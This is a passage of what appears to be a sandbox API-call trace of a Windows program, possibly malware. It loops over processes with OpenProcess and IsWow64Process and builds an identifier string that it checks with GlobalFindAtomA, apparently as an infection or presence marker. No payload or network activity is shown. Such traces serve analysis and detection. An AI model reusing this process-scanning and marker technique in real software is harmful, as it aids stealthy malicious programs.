	[0110.425] CloseHandle (hObject=0x694) returned 1
	[0110.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0110.425] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.425] CloseHandle (hObject=0x694) returned 1
	[0110.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0110.425] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.426] CloseHandle (hObject=0x694) returned 1
	[0110.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0110.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0110.426] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.426] CloseHandle (hObject=0x694) returned 1
	[0110.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0110.426] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.426] CloseHandle (hObject=0x694) returned 1
	[0110.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0110.426] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.426] CloseHandle (hObject=0x694) returned 1
	[0110.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0110.426] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.426] CloseHandle (hObject=0x694) returned 1
	[0110.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0110.427] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.427] CloseHandle (hObject=0x694) returned 1
	[0110.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0110.427] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.427] CloseHandle (hObject=0x694) returned 1
	[0110.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0110.427] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.427] CloseHandle (hObject=0x694) returned 1
	[0110.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0110.427] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.427] CloseHandle (hObject=0x694) returned 1
	[0110.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0110.427] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.427] CloseHandle (hObject=0x694) returned 1
	[0110.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0110.428] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.428] CloseHandle (hObject=0x694) returned 1
	[0110.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0110.428] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.428] CloseHandle (hObject=0x694) returned 1
	[0110.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0110.428] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.428] CloseHandle (hObject=0x694) returned 1
	[0110.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0110.428] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.428] CloseHandle (hObject=0x694) returned 1
	[0110.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0110.428] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.429] CloseHandle (hObject=0x694) returned 1
	[0110.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0110.429] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.429] CloseHandle (hObject=0x694) returned 1
	[0110.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0110.429] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.429] CloseHandle (hObject=0x694) returned 1
	[0110.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0110.429] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.429] CloseHandle (hObject=0x694) returned 1
	[0110.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0110.429] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.429] CloseHandle (hObject=0x694) returned 1
	[0110.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0110.430] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.430] CloseHandle (hObject=0x694) returned 1
	[0110.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0110.430] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.430] CloseHandle (hObject=0x694) returned 1
	[0110.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0110.430] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.430] CloseHandle (hObject=0x694) returned 1
	[0110.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0110.430] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.430] CloseHandle (hObject=0x694) returned 1
	[0110.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0110.430] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.430] CloseHandle (hObject=0x694) returned 1
	[0110.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0110.431] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.431] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0110.431] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0110.431] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0110.432] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.432] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0110.432] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.432] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0110.432] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0110.432] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0110.485] CloseHandle (hObject=0x694) returned 1
	[0110.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0110.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0110.486] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.486] CloseHandle (hObject=0x694) returned 1
	[0110.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0110.486] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.486] CloseHandle (hObject=0x694) returned 1
	[0110.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0110.486] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.486] CloseHandle (hObject=0x694) returned 1
	[0110.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0110.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0110.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0110.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0110.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0110.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0110.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0110.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0110.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0110.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0110.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0110.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0110.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0110.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0110.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0110.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0110.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0110.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0110.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0110.583] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.583] CloseHandle (hObject=0x694) returned 1
	[0110.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0110.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0110.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0110.583] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.583] CloseHandle (hObject=0x694) returned 1
	[0110.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0110.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0110.583] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.584] CloseHandle (hObject=0x694) returned 1
	[0110.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0110.584] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.584] CloseHandle (hObject=0x694) returned 1
	[0110.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0110.584] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.584] CloseHandle (hObject=0x694) returned 1
	[0110.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0110.584] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.584] CloseHandle (hObject=0x694) returned 1
	[0110.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0110.585] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.585] CloseHandle (hObject=0x694) returned 1
	[0110.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0110.585] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.585] CloseHandle (hObject=0x694) returned 1
	[0110.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0110.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0110.590] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.590] CloseHandle (hObject=0x694) returned 1
	[0110.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0110.590] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.590] CloseHandle (hObject=0x694) returned 1
	[0110.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0110.590] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.590] CloseHandle (hObject=0x694) returned 1
	[0110.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0110.590] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.590] CloseHandle (hObject=0x694) returned 1
	[0110.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0110.590] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.590] CloseHandle (hObject=0x694) returned 1
	[0110.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0110.591] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.591] CloseHandle (hObject=0x694) returned 1
	[0110.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0110.591] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.591] CloseHandle (hObject=0x694) returned 1
	[0110.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0110.591] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.591] CloseHandle (hObject=0x694) returned 1
	[0110.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0110.591] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.591] CloseHandle (hObject=0x694) returned 1
	[0110.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0110.591] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.592] CloseHandle (hObject=0x694) returned 1
	[0110.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0110.592] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.592] CloseHandle (hObject=0x694) returned 1
	[0110.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0110.592] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.592] CloseHandle (hObject=0x694) returned 1
	[0110.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0110.592] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.592] CloseHandle (hObject=0x694) returned 1
	[0110.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0110.592] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.592] CloseHandle (hObject=0x694) returned 1
	[0110.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0110.593] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.593] CloseHandle (hObject=0x694) returned 1
	[0110.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0110.593] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.593] CloseHandle (hObject=0x694) returned 1
	[0110.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0110.593] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.593] CloseHandle (hObject=0x694) returned 1
	[0110.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0110.593] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.593] CloseHandle (hObject=0x694) returned 1
	[0110.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0110.593] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.594] CloseHandle (hObject=0x694) returned 1
	[0110.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0110.594] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.594] CloseHandle (hObject=0x694) returned 1
	[0110.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0110.594] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.594] CloseHandle (hObject=0x694) returned 1
	[0110.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0110.594] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.594] CloseHandle (hObject=0x694) returned 1
	[0110.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0110.594] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.594] CloseHandle (hObject=0x694) returned 1
	[0110.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0110.595] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.595] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0110.595] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0110.595] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0110.596] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.596] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0110.596] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0110.596] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0110.596] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0110.596] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0110.597] CloseHandle (hObject=0x694) returned 1
	[0110.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0110.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0110.597] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.597] CloseHandle (hObject=0x694) returned 1
	[0110.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0110.597] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.597] CloseHandle (hObject=0x694) returned 1
	[0110.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0110.597] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.597] CloseHandle (hObject=0x694) returned 1
	[0110.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0110.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0110.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0110.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0110.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0110.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0110.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0110.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0110.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0110.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0110.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0110.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0110.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0110.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0110.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0110.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0110.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0110.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0110.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0110.671] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.671] CloseHandle (hObject=0x694) returned 1
	[0110.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0110.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0110.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0110.672] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.672] CloseHandle (hObject=0x694) returned 1
	[0110.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0110.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0110.672] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.672] CloseHandle (hObject=0x694) returned 1
	[0110.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0110.673] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.673] CloseHandle (hObject=0x694) returned 1
	[0110.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0110.673] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.673] CloseHandle (hObject=0x694) returned 1
	[0110.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0110.673] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.673] CloseHandle (hObject=0x694) returned 1
	[0110.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0110.673] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.673] CloseHandle (hObject=0x694) returned 1
	[0110.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0110.673] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.673] CloseHandle (hObject=0x694) returned 1
	[0110.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0110.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0110.674] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.674] CloseHandle (hObject=0x694) returned 1
	[0110.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0110.674] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.674] CloseHandle (hObject=0x694) returned 1
	[0110.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0110.674] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.674] CloseHandle (hObject=0x694) returned 1
	[0110.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0110.674] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0110.675] CloseHandle (hObject=0x694) returned 1
	[0110.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0110.675] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
